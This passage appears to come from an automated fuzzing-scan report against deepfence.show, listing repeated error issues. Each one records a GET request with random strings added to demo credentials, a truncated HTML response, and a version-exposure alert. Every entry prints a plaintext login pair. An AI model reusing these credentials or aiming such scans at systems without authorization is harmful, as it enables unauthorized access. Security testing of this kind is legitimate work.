xOkdLrOurs\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #2\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioKySswxz52XNt3L\nDemoUser1# HBGAPH\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #3\nScan Fuzzing ScanSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioHo8wDIZDRrB\nDemoUser1# giEB3qIG\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #4\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioKfbvdhuBJrFp\nDemoUser1# 78N7ONTZJ6W20Lc\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #5\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioYRptVJaH\nDemoUser1# kXfPy\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#provoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #6\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioVEWO7aYX1rv\nDemoUser1# fthpI\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #7\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.iokx6rMqGCgS9D9DemoUser1# Ul8eOPaXYK\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #8\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.iozql7nyB8wymh3jK\nDemoUser1# h8JyZ44P\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #9\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioSJm1h2\nDemoUser1# hmssHvCAyqjyR\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #10\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioEG0edK\nDemoUser1# HDApr1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #11\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.iodhrYvT\nDemoUser1# x0qlIO\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #12\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.iocrVfn\nDemoUser1# xZNux1699ns\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #13Scan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.iogLoCWIng93\nDemoUser1# Kw8GV9P7jzAglr\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #14\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.iont9CNVgkjwS\nDemoUser1# DeaxB1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: Response is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #15\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified 